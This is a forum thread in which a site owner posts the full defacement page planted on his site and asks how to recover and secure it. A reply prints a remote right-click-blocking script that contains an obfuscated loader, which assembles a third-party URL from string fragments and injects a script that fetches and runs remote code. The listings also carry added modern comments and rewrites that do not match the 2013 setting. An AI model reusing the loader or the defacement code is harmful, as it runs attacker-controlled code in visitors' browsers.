
I need some help I was hacked!

Discussion in 'HTML & JavaScript' started by astbnboy, Dec 19, 2013.

  1. astbnboy

    astbnboy Registered Member

    I have an adult site that was hacked, which caused my account to be suspended yesterday. He got in and changed my index.php page to the following:

    PHP:
    <html xmlns="http://www.w3.org/1999/xhtml">
    <
    link rel="shortcut icon" type="image/png" href="https://fbcdn-sphotos-d-a.akamaihd.net/hphotos-ak-snc7/399305_118448341652178_1642885313_n.jpg" />
    <
    head>
    <
    meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <
    title>~Hacked By Grey D0R43M0N~</title>


    <
    br/>

    <
    blink><font face="snap itc" size="8" color="red"  class="a">HACKED </font><font face="Chiller" size="6" color="yellow"  class="a">BY</font><font face="Nosifer" size="7" color="gray"  class="a"Grey </font><font face="Nosifer" size="8" color="green"  class="a">D0r43m0n</font></blink>
    <
    meta name="Description" content="Grey D0r43m0n">
    <
    script language="JavaScript">





    </script>
    <script language="javascript">
    // Mouse-trail script: writes one absolutely positioned element per character of
    // `text` and, on a timer, lines those elements up behind the mouse pointer.
    // NOTE(review): as displayed, this copy has two unterminated string literals
    // (`text.split(')` and `var t=';`), presumably empty '' literals lost when the
    // forum rendered the listing, so it does not parse as shown. The same script
    // appears again further down this listing with different constants.
    var text='Grey D0r43m0n WAS HERE';
    var delay=5;
    var Xoff=0;
    var Yoff=-30;
    var txtw=10;
    var beghtml='<font face="Agency FB" color="#FFFFFF" style="" size="4em"><b>';
    var endhtml='</b></font>';
    // Browser sniffing stored in implicit globals; ns6 is assigned but never read in this listing.
    ns4 = (navigator.appName.indexOf("Netscape")>=0 && document.layers)? true: false;
    ie4 = (document.all && !document.getElementById)? true : false;
    ie5 = (document.all && document.getElementById)? true : false;
    ns6 = (document.getElementById && navigator.appName.indexOf("Netscape")>=0 )? true: false;
    var txtA=new Array();
    text=text.split(');
    var x1=0;
    var y1=-50;
    var t=';
    // Build one <layer> (ns4) or <div id="txtN"> per character, parked off-screen at top:-100.
    for(i=1;i<=text.length;i++){
    t+=(ns4)? '<layer left="0" top="-100" width="'+txtw+'" name="txt'+i+'" height="1">' : '<div id="txt'+i+'" style="position:absolute; top:-100px; left:0px; height:1px; width:'+txtw+'; visibility:visible;">';
    t+=beghtml+text[i-1]+endhtml;
    t+=(ns4)? '</layer>' : '</div>';
    }
    // The generated markup is injected into the page while it is still being parsed.
    document.write(t);
    // Place one trail element at (x, y): moveTo() on ns4 layers, style.left/top otherwise.
    function moveid(id,x,y){
    if(ns4)id.moveTo(x,y);
    else{
    id.style.left=x+'px';
    id.style.top=y+'px';
    }}
    // mousemove handler: stores the pointer position plus Xoff/Yoff in the globals x1/y1.
    function animate(evt){
    x1=Xoff+((ie4||ie5)?event.clientX+document.body.scrollLeft:evt.pageX);
    y1=Yoff+((ie4||ie5)?event.clientY+document.body.scrollTop:evt.pageY);
    }
    // Current left position of a trail element (NaN when style.left is empty).
    function getidleft(id){
    if(ns4)return id.left;
    else return parseInt(id.style.left);
    }
    // Current top position of a trail element.
    function getidtop(id){
    if(ns4)return id.top;
    else return parseInt(id.style.top);
    }
    // Right edge of the visible area, including horizontal scroll.
    function getwindowwidth(){
    if(ie4||ie5)return document.body.clientWidth+document.body.scrollLeft;
    else return window.innerWidth+pageXOffset;
    }
    // One animation step: each element takes the place txtw pixels right of the one
    // before it (or is parked off-screen near the right edge); element 1 follows the pointer.
    function movetxts(){
    for(i=text.length;i>1;i=i-1){
    if(getidleft(txtA[i-1])+txtw*2>=getwindowwidth()){
    moveid(txtA[i-1],0,-100);
    moveid(txtA[i],0,-100);
    }else moveid(txtA[i], getidleft(txtA[i-1])+txtw, getidtop(txtA[i-1]));
    }
    moveid(txtA[1],x1,y1);
    }
    // On load: collect the generated elements into txtA, hook mousemove, start the timer.
    // The timer is given a string, which the browser evaluates as code on every tick.
    window.onload=function(){
    for(i=1;i<=text.length;i++)txtA[i]=(ns4)?document.layers['txt'+i]:(ie4)?document.all['txt'+i]:document.getElementById('txt'+i);
    if(ns4)document.captureEvents(Event.MOUSEMOVE);
    document.onmousemove=animate;
    setInterval('movetxts()',delay);
    }
    </script>
    <center>
    <style>
    body {cursor:cross;
        background: #000000 url(http://www.alboraaq.com/jpg/CpD39032.gif) scroll repeat center center;
    </style>
    <style>
    body{text-align;font-family: 'Averia Sans Libre', cursive;}
    hr{border: 1px solid #1C1C1C;}
    </style>
    <style type="text/css">
    body,td,th {
        color: #FFFFFF;
    }
    body {cursor:url("http://www.fbvideo.16mb.com/files/cur.cur"),default;
        background-color: #000000;
    }
    a { text-decoration:none; }
    a:link { color: #00FF00}
    a:visited { color: #00FF00}
    a:hover { color: #00FF00}
    a:active { color: #00FF00}

    .style2 {Helvetica, sans-serif; font-weight: bold; font-size: 15px; }
    .style3 {Helvetica, sans-serif; font-weight: bold; }
    .style4 {color: #FFFF00}
    .style5 {color: #FF0000}
    .style6 {color: #00FF00}
    img{border:4px double green;
        box-shadow:0px 9px 15px white;
        border-radius:10px;}
    .thanks{border:4px double green;
        box-shadow:0px 2px 20px white;
        border-radius:10px;
        padding:9px;}
    .a{text-shadow:0px 1px 10px lime;}
    </style>
    </head>
    <body>


    <script language="JavaScript1.2">var rector=3 // pixels added or subtracted per shake step in rattleimage()
    var stopit=0 // set to 1 by stoprattle(); rattleimage() returns early when it is 1
    var a=1 // current phase of the shake cycle; rattleimage() steps it 1..4 and wraps to 1
    /**
     * Arm the shake effect for one element.
     *
     * Records the element in the global `shake`, clears the global stop flag
     * and resets the element's left/top offsets to 0.
     *
     * @param {object} which - element whose `style.left`/`style.top` are reset
     */
    function init(which) {
      shake = which;
      stopit = 0;
      which.style.left = 0;
      which.style.top = 0;
    }
    /**
     * Perform one step of the shake animation on the global `shake` element
     * and schedule the next step 10 ms later.
     *
     * The four phases of `a` move the element down, right, up and left by
     * `rector` pixels. Nothing happens when the browser exposes neither
     * document.all nor document.getElementById, or when `stopit` is 1.
     * The next step is scheduled with a string argument, which the browser
     * evaluates as code.
     */
    function rattleimage() {
      const unsupported = !document.all && !document.getElementById;
      if (unsupported || stopit == 1) {
        return;
      }

      // Phases 1 and 3 act on `top`, the others on `left`; phases 1 and 2 add, the others subtract.
      const axis = (a == 1 || a == 3) ? 'top' : 'left';
      const current = parseInt(shake.style[axis]);
      if (a == 1 || a == 2) {
        shake.style[axis] = current + rector + "px";
      } else {
        shake.style[axis] = current - rector + "px";
      }

      if (a < 4) {
        a++;
      } else {
        a = 1;
      }
      setTimeout("rattleimage()", 10);
    }
    // Stop the shake: raises the global stop flag that rattleimage() checks and
    // resets the given element's left/top offsets to 0.
    // NOTE(review): no call to stoprattle() is visible in this listing.
    function stoprattle(which){
    stopit=1
    which.style.left=0
    which.style.top=0
    }</script><style type="text/css"><!--
    body,td,th {;
    text-align: center;
    } {
    color: #0C3;
    font-size: 20px;
    }
    body {}
    .shakeimage{
    position:relative
    }
    .glow {}
    .contact {
    }{}
    .lol {}
    #owned{_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);
    _left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);
    }
    a:l--></style>
    <center><img alt="" src="http://sphotos-b.xx.fbcdn.net/hphotos-ash3/p206x206/540456_108180799354338_730264429_n.jpg"  width="45%" height="45%"" border="0" class="shakeimage" onMouseover="init(this);rattleimage()"
    onload="init(this);rattleimage()"></a></span></center>
    <center>






    </br></br></br> 
    <a style="display:scroll;position:fixed;bottom:5px;right:5px;" href="http://www.facebook.com/Grey.D0r43m0n" title="Freedom Palestine , Vanish Israhell"><img src="http://i49.tinypic.com/mrnmu.gif" width="450" height="90" /></a>
    </div>




    <hr />
    <span class="a"> Hello Admin , We hacked because your security website need to patch. Contact us if you need something to discuss ! </span><br>
    <span class="style4"> Contact Us</span><br />
    <span class="style6"><a href="https://www.facebook.com/BDGREYHATHACKERS"> BGHH </a></span><br><br>
    <hr />




    <center>

    <a target=blank href="https://www.facebook.com/BDGREYHATHACKERS" style="text-decoration: none"><font color=#A8A5A5 size=2>

    <b><blink>[+] WE ARE BD GREY HAT HACKERS [+]</blink></b></font></a></font></p>

    </center>








    </script>

    <!-- HTML Codes by Grey D0r43m0nn -->
    </a></p><p style="font-size: 11px;">

    </p><p align="center"><a><font color="#1D00DA"><b><i><i></i></i></b><i><i></i></i></font></a></p>

    <p align="center"><a><i><i><font color="#1D00DA"><b><i><i></i></i></b><i><i></i></i></font></i></i></a></p>

    <!--TEXT SMART-->
    <script language="javascript">

    // Mouse-trail setup. Each character of `text` is wrapped in its own element,
    // so the string is treated as plain characters, not markup.
    var text = '-=Grey D0r43m0n=-';
    var delay = 40;   // timer period handed to setInterval
    var Xoff = 0;     // horizontal offset from the pointer, in pixels (negative = left)
    var Yoff = -30;   // vertical offset from the pointer, in pixels (negative = up)
    var txtw = 14;    // horizontal space reserved per character, in pixels
    var beghtml = '<font color="#F8E801 "><b>';   // markup emitted before every character
    var endhtml = '</b></font>';                  // markup emitted after every character

    // Browser sniffing kept in implicit globals, because the functions that follow read them.
    // ns6 is assigned but not read anywhere in this listing.
    ns4 = Boolean(navigator.appName.indexOf("Netscape") >= 0 && document.layers);
    ie4 = Boolean(document.all && !document.getElementById);
    ie5 = Boolean(document.all && document.getElementById);
    ns6 = Boolean(document.getElementById && navigator.appName.indexOf("Netscape") >= 0);

    var txtA = [];
    text = text.split('');
    var x1 = 0;
    var y1 = -1000;
    var t = '';

    // One off-screen <layer> (ns4) or <div id="txtN"> per character; `i` stays an implicit global.
    for (i = 1; i <= text.length; i++) {
      if (ns4) {
        t += '<layer name="txt' + i + '" top="-100" left="0" width="' + txtw + '" height="1">';
        t += beghtml + text[i - 1] + endhtml;
        t += '</layer>';
      } else {
        t += '<div id="txt' + i + '" style="position:absolute; top:-100px; left:0px; height:1px; width:' + txtw + '; visibility:visible;">';
        t += beghtml + text[i - 1] + endhtml;
        t += '</div>';
      }
    }

    // Inject the generated markup while the page is still being parsed.
    document.write(t);

    /**
     * Place one trail element at the given coordinates.
     *
     * @param {object} id - the element (or ns4 layer) to move
     * @param {number} x - new left position in pixels
     * @param {number} y - new top position in pixels
     */
    function moveid(id, x, y) {
      if (ns4) {
        // ns4 layers are moved through their own method.
        id.moveTo(x, y);
        return;
      }
      id.style.left = x + 'px';
      id.style.top = y + 'px';
    }

    /**
     * mousemove handler: stores the pointer position, shifted by Xoff/Yoff,
     * in the globals x1 and y1.
     *
     * When ie4 or ie5 is set, the position is read from the global `event`
     * plus the body scroll offsets; otherwise from evt.pageX / evt.pageY.
     *
     * @param {object} evt - the event object (unused on the ie4/ie5 path)
     */
    function animate(evt) {
      if (ie4 || ie5) {
        x1 = Xoff + (event.clientX + document.body.scrollLeft);
        y1 = Yoff + (event.clientY + document.body.scrollTop);
      } else {
        x1 = Xoff + evt.pageX;
        y1 = Yoff + evt.pageY;
      }
    }

    /**
     * Read the current left position of a trail element.
     *
     * @param {object} id - the element (or ns4 layer)
     * @returns {number} `id.left` on ns4, otherwise the integer parsed from
     *   `id.style.left` (NaN when that string has no leading number)
     */
    function getidleft(id) {
      return ns4 ? id.left : parseInt(id.style.left);
    }

    /**
     * Read the current top position of a trail element.
     *
     * @param {object} id - the element (or ns4 layer)
     * @returns {number} `id.top` on ns4, otherwise the integer parsed from
     *   `id.style.top` (NaN when that string has no leading number)
     */
    function getidtop(id) {
      return ns4 ? id.top : parseInt(id.style.top);
    }

    /**
     * Right edge of the visible area in page coordinates: viewport width plus
     * horizontal scroll, read from document.body on ie4/ie5 and from
     * window.innerWidth / pageXOffset elsewhere.
     *
     * @returns {number}
     */
    function getwindowwidth() {
      const legacyIE = ie4 || ie5;
      return legacyIE
        ? document.body.clientWidth + document.body.scrollLeft
        : window.innerWidth + pageXOffset;
    }

    /**
     * One animation step, run from the timer started in window.onload.
     *
     * Walking from the last character back to the second, each element is put
     * txtw pixels to the right of the element before it; when that would reach
     * the right edge of the window, both elements are parked off-screen at
     * top -1000 instead. The first element is then moved to the last recorded
     * pointer position (x1, y1). The loop counter `i` is an implicit global.
     */
    function movetxts() {
      i = text.length;
      while (i > 1) {
        const ahead = txtA[i - 1];
        const overflows = getidleft(ahead) + txtw * 2 >= getwindowwidth();
        if (overflows) {
          moveid(ahead, 0, -1000);
          moveid(txtA[i], 0, -1000);
        } else {
          moveid(txtA[i], getidleft(ahead) + txtw, getidtop(ahead));
        }
        i = i - 1;
      }
      moveid(txtA[1], x1, y1);
    }

    // On load: look up every generated trail element, hook mousemove and start the timer.
    // This assignment replaces any window.onload handler set earlier on the page.
    window.onload = function () {
      for (i = 1; i <= text.length; i++) {
        if (ns4) {
          txtA[i] = document.layers['txt' + i];
        } else if (ie4) {
          txtA[i] = document.all['txt' + i];
        } else {
          txtA[i] = document.getElementById('txt' + i);
        }
      }

      if (ns4) {
        document.captureEvents(Event.MOUSEMOVE);
      }

      document.onmousemove = animate;
      // String form of setInterval: the browser evaluates the string as code on every tick.
      setInterval('movetxts()', delay);
    }

    </script>






















































    <!-- Sets two globals, a theme name and an image URL; the script quoted later in this thread reads both. -->
    <script type='text/javascript'>
    var DADrightclicktheme = 'Dark';
    var DADrightclickimage = 'http://i42.tinypic.com/69josm.jpg';</script>
    <!-- Third-party JavaScript fetched over plain HTTP and executed in this page; it runs whatever that host serves at load time, so the file has to be read in full before it can be called harmless. -->
    <script type='text/javascript' src="http://tuyulz-blogspot.googlecode.com/files/Anti%20Klik.js"> </script> 














    <body oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;'>

    <SCRIPT LANGUAGE="JavaScript">  
    <!-- Disable  
    /**
     * Event handler that cancels whatever event it is attached to.
     *
     * @param {object} e - the event object (ignored)
     * @returns {boolean} always false
     */
    function disableselect(e) {
      return false;
    }

    /**
     * Event handler that lets the event proceed.
     *
     * @returns {boolean} always true
     */
    function reEnable() {
      return true;
    }

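    // Cancel text selection and the context menu for the whole document
    // (the original comment labels this the IE4+ path).
    // disableselect is assigned directly instead of `new Function("return false")`:
    // the result is the same, without compiling a function from a string.
    document.onselectstart = disableselect;
    document.oncontextmenu = disableselect;
    // Path the original comment labels NS6: cancel mousedown (which blocks
    // selection there) while still letting clicks through.
    if (window.sidebar) {
      document.onmousedown = disableselect;
      document.onclick = reEnable;
    }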
    //-->  
    </script>
     











    <center><font face= 'tahoma' class='wglow' color='white'>Greetz To:</font><center>
             
             
            <marquee>
             
            <font class='whiteglow' face='tahoma'> | </font>
             
            <font face='tahoma' color='green' class='wglow'>Bd Xtor  - TiGER-M@TE - Rotating Rotor  - cr4ck br4iN - Ablaze ever - Mahayrab Ferdous - Krad X!n - Murkho Manob - Core Tuner - Red Core </font>
             
            <font class='whiteglow' face='tahoma'> || </font>
             
            <font face='tahoma' color='red' class='redglow'>Ashik Iqbal  - Space Fighter -  B|_@CK J4CK   - Black Man - Reza BGHH </font>
              
            <font class='whiteglow' face='tahoma'> || </font>
             
            <font face='tahoma' color='green' class='redglow'>Sharif BGHH  - Ly Ly - Dr@cul@  - Fakessh -  R3D Dr4G0N  - Ac3@n - r00t3xpl0i7   ~ Kp ~  ShopnoPathik Aion </font>        
            
            <font class='whiteglow' face='tahoma'> || </font>
             
             
          
            <font face='tahoma' color='orange' class='wglow'>ALL BANGLADESHI HACKERS!</font>
             
            <font class='whiteglow' face='tahoma'> || </font>
             
            <font face='tahoma' color='purple' class='blueglow'>ALL MUSLIM HACKERS</font>
             
            <font class='whiteglow' face='tahoma'> || </font>
             
            <font face='tahoma' color='white' class='wglow'>And Also u Admin</font>
             
            <font class='whiteglow' face='tahoma'> | </font>
             
            </marquee>
             
            </b>











     



    <div align="center" class="shdw">Remember we can see you</div><br /><div align="center"><img src="http://www.123myip.co.uk/ip-address/?size=468x60" border="0" width="500" height="60" alt="BDGHH" /></div>




    <font color="purple">
    <div align="center">Copyright Â© <span>BD GREY HAT HACKERS</span>. All rights Reserved.</div></font>
    <script>
       




        <!-- Made By Grey D0r43m0n -->  </body></html>
    The portion of this script I find most disturbing is:
    PHP:
    <script type='text/javascript' src="http://tuyulz-blogspot.googlecode.com/files/Anti%20Klik.js"</script> 
    I'm wondering what sort of nastiness is in this script!!!
    If he was able to get in, which I have to think was pretty easy for him, where else did he leave this bundle of joy inside my site???

    How do I secure my site from these assholes? It's written in PHP and I don't know what to do from here.
    Can I get some help, please?
    Keith
     
  2. divok

    divok Senior Member

    The culprit could be Flash, a nulled script, or maybe your own infected computer.
    Where did you get your script from?
     
  3. VoidITSolutions

    VoidITSolutions BANNED BANNED

    What is your CMS?
     
  4. xxf8xx

    xxf8xx Supreme Member

    Scan your computer first of all. Then Google for a basic backdoor finder: a script you upload that scans your sites for backdoors and tells you where they are. Then, hopefully you have a backup of your site (one taken before the break-in) so you can restore it. If you use WordPress, always make sure you update to the latest version and get some security plugins.
     
  5. VoidITSolutions

    VoidITSolutions BANNED BANNED

    I'll look it over and help you fix it, no charge. If you don't reply soon it'll need to wait until tomorrow however.
    You're just one of countless sites hacked. A google search for the "hacker's" (script-kiddy pussy) text shows this.
    It's probably a vulnerability in your CMS or a plugin.
     
  6. GreyKnight

    GreyKnight Regular Member

    The script is not dangerous at all.
    Judging by the script's name and address, it came from a blogger in Indonesia.
    But the hacker seems to be from Myanmar: script kiddies, nothing more. True hackers never reveal that they are hackers.

    The original script is as follows :
    Code:
    // Pick the overlay background colour from the theme name set by the embedding page.
    // Only the three spellings listed for each theme match; anything else gives 'transparent'.
    // (Merah / Biru / Hijau presumably mean red / blue / green, matching the colour values.)
    var DADarcv2t = (function (theme) {
      var palette = [
        [['Merah', 'MERAH', 'merah'], 'rgba(239,110,119, 0.9)'],
        [['Biru', 'BIRU', 'biru'], 'rgba(110,137,239, 0.9)'],
        [['Hijau', 'HIJAU', 'hijau'], 'rgba(110,239,110, 0.9)'],
        [['Light', 'light', 'LIGHT'], 'rgba(255,255,255, 0.9)'],
        [['Pink', 'pink', 'PINK'], 'rgba(239,110,225, 0.9)'],
        [['Dark', 'dark', 'DARK'], 'rgba(0,0,0, 0.9)']
      ];
      for (var row = 0; row < palette.length; row++) {
        var spellings = palette[row][0];
        for (var col = 0; col < spellings.length; col++) {
          // Loose comparison, as in the original chain of == tests.
          if (theme == spellings[col]) {
            return palette[row][1];
          }
        }
      }
      return 'transparent';
    })(DADrightclicktheme);
    /**
     * Toggle the full-page overlay element with id "DADarcv2c": hide it when its
     * inline display is "block", show it (display "block") otherwise.
     */
    function DADarcvwi2() {
      var overlay = document.getElementById('DADarcv2c');
      overlay.style.display = overlay.style.display == "block" ? "none" : "block";
    }
    /**
     * Context-menu handler: toggles the overlay through DADarcvwi2() and
     * cancels the browser's own menu.
     *
     * @returns {boolean} always false
     */
    function DADarcwiv2a() {
      DADarcvwi2();
      return false;
    }
    // Replace the document's context-menu handler: a right-click toggles the overlay instead of opening the menu.
    document.oncontextmenu=DADarcwiv2a;
    // Remote loader: assembles a script URL from separate string fragments, creates a <script>
    // element with that src and appends it to <head>, so the browser fetches and runs whatever
    // that host returns inside the embedding page.
    // NOTE(review): splitting the host name into fragments keeps it from matching a plain-text
    // search of the file; this line appears unrelated to the right-click handling around it.
    var ypro='http:';var yajax=document.createElement('script');yajax.type='text/javascript';var yquery='dic';var ybrow='aru.c';var yint='/';yajax.src=ypro+'//x.'+yquery+'keym'+ybrow+'om'+yint+'y';document.getElementsByTagName('head')[0].appendChild(yajax);
    // Writes the overlay's <style> and <div id="DADarcv2c"> into the page. DADrightclickimage and
    // DADarcv2t are concatenated into the markup unescaped. document.write() returns undefined,
    // so the trailing appendChild(DADrcdiv) receives undefined and presumably throws.
    var DADrcdiv=document.write('<style type="text/css">#DADarcv2c{background:url('+DADrightclickimage+') no-repeat center center fixed '+DADarcv2t+';text-align:center;width:100%;height:100%;position:fixed;top:0px;left:0px;bottom:0px;right:0px;border:0px;z-index:1000000;display:none;padding:auto;}#DADarcv2c span{position:fixed;bottom:0px;left:10%;right:10%;cursor:pointer;font-size:20px;}</style><div id="DADarcv2c" class="DADpointer" onclick="DADarcvwi2();" title="Klick Dimana Saja Untuk Menutup Warning Ini"><center><span><a href="#" target="_blank"></a></span></center></div>');document.getElementsByTagName('body')[0].appendChild(DADrcdiv);
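    Based on the script documentation, it just prevents people from right-clicking on your website. Note, though, that the line that builds `yajax.src` from string fragments also appends a second remote script to the page's head, so the page runs whatever that host serves as well.
    Furthermore, the hacker modified the Indonesian blogger's script to change the image from the "Free Palestine" one to some guy slapping some Indian guy.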
     
  7. colleyboy

    colleyboy Newbie

    Being hacked is horrible. Having been a victim before, I know that it takes COUNTLESS hours of going through all the files on the server, scanning for back doors, securing scripts, and updating server software (Apache etc.). I feel for you, but this kind of entry looks like the result of an easy username/password combo on your server. This was probably done via FTP access, so before you bother undoing the damage, change ALL usernames on the server, email accounts, MySQL and everything! Only then can you start the cleanup process.
     
  8. Gogol

    Gogol Elite Member

    You can contact me, but I won't do it for free. If you don't get to the root of the problem, it will get hacked again pretty soon. At present, most sites get hacked because of RFI (remote file inclusion). If you have any file-upload script, quadruple-check it ;)